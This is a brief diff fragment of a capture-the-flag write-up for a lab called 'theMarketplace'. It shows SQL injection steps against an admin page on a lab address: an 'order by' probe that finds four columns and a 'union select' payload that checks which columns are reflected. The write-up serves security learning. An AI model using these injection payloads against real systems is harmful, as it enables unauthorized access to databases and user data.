Neyr/CTF-Writeups/theMarketplace/README.md

 10.10.160.210:32768/admin?user=2 order by 5
 ```

-After test 2-4 we find that we receive an error on 5, so we have 4 columns.
+After testing 2-4 we find that we receive an error on 5, so we have 4 columns.
 Looking at the user listing we know there is no user 0 so we can see which columns are reflected with the following
 ```
 http://10.10.160.210:32768/admin?user=0 union select 1,2,3,4